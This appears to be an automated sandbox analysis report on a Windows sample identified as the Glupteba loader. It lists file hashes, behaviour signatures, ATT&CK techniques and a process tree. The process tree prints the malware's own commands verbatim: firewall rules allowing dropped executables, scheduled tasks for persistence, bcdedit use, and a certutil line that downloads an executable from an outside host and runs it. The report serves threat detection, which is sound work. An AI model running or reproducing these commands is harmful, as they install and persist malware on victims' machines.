Analysis

  • max time kernel
    104s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    24-05-2022 13:38

General

  • Target

    cdbc70a5bce6d5c7c10882f2d84d899385fe2833b40dba200917926c66ff34c6.exe

  • Size

    3.8MB

  • MD5

    4a000400f17b48589a88c179e6a1d77b

  • SHA1

    2d589c7e3787c5390d453813422f5f12b8dda608

  • SHA256

    cdbc70a5bce6d5c7c10882f2d84d899385fe2833b40dba200917926c66ff34c6

  • SHA512

    60b5efa71e7b7c610ca8d5584ac587659a5bd1109f8a972ab43e7f1ca98a4a10d70d47b243988c3a38cbe42b01dea5ebd702ac7ff0ca7636cf9a99086b192cbc

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in System32 directory 8 IoCs
  • Drops file in Windows directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cdbc70a5bce6d5c7c10882f2d84d899385fe2833b40dba200917926c66ff34c6.exe
    "C:\Users\Admin\AppData\Local\Temp\cdbc70a5bce6d5c7c10882f2d84d899385fe2833b40dba200917926c66ff34c6.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4180
    • C:\Users\Admin\AppData\Local\Temp\cdbc70a5bce6d5c7c10882f2d84d899385fe2833b40dba200917926c66ff34c6.exe
      "C:\Users\Admin\AppData\Local\Temp\cdbc70a5bce6d5c7c10882f2d84d899385fe2833b40dba200917926c66ff34c6.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1712
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3608
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
            PID:2568
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\85edacfd9338\85edacfd9338\85edacfd9338.exe" enable=yes"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4844
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\85edacfd9338\85edacfd9338\85edacfd9338.exe" enable=yes
            4⤵
              PID:3484
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            3⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1108
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:1900
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              4⤵
              • Creates scheduled task(s)
              PID:2472
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              4⤵
              • Executes dropped EXE
              PID:1068
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:3676
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4840

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      2
      T1112

      Install Root Certificate

      1
      T1130

      Discovery

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        4a000400f17b48589a88c179e6a1d77b

        SHA1

        2d589c7e3787c5390d453813422f5f12b8dda608

        SHA256

        cdbc70a5bce6d5c7c10882f2d84d899385fe2833b40dba200917926c66ff34c6

        SHA512

        60b5efa71e7b7c610ca8d5584ac587659a5bd1109f8a972ab43e7f1ca98a4a10d70d47b243988c3a38cbe42b01dea5ebd702ac7ff0ca7636cf9a99086b192cbc

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        4a000400f17b48589a88c179e6a1d77b

        SHA1

        2d589c7e3787c5390d453813422f5f12b8dda608

        SHA256

        cdbc70a5bce6d5c7c10882f2d84d899385fe2833b40dba200917926c66ff34c6

        SHA512

        60b5efa71e7b7c610ca8d5584ac587659a5bd1109f8a972ab43e7f1ca98a4a10d70d47b243988c3a38cbe42b01dea5ebd702ac7ff0ca7636cf9a99086b192cbc

      • memory/1068-148-0x0000000000000000-mapping.dmp
      • memory/1108-147-0x0000000000400000-0x0000000001E38000-memory.dmp
        Filesize

        26.2MB

      • memory/1108-146-0x0000000002800000-0x0000000002BA6000-memory.dmp
        Filesize

        3.6MB

      • memory/1108-141-0x0000000000000000-mapping.dmp
      • memory/1712-133-0x0000000000000000-mapping.dmp
      • memory/1712-135-0x000000000241E000-0x00000000027C4000-memory.dmp
        Filesize

        3.6MB

      • memory/1712-137-0x00000000027D0000-0x0000000002EC5000-memory.dmp
        Filesize

        7.0MB

      • memory/1712-138-0x0000000000400000-0x0000000001E38000-memory.dmp
        Filesize

        26.2MB

      • memory/1900-144-0x0000000000000000-mapping.dmp
      • memory/2472-145-0x0000000000000000-mapping.dmp
      • memory/2568-136-0x0000000000000000-mapping.dmp
      • memory/3484-140-0x0000000000000000-mapping.dmp
      • memory/3608-134-0x0000000000000000-mapping.dmp
      • memory/3676-150-0x0000000000000000-mapping.dmp
      • memory/4180-130-0x00000000023DD000-0x0000000002783000-memory.dmp
        Filesize

        3.6MB

      • memory/4180-132-0x0000000000400000-0x0000000001E38000-memory.dmp
        Filesize

        26.2MB

      • memory/4180-131-0x0000000002790000-0x0000000002E85000-memory.dmp
        Filesize

        7.0MB

      • memory/4844-139-0x0000000000000000-mapping.dmp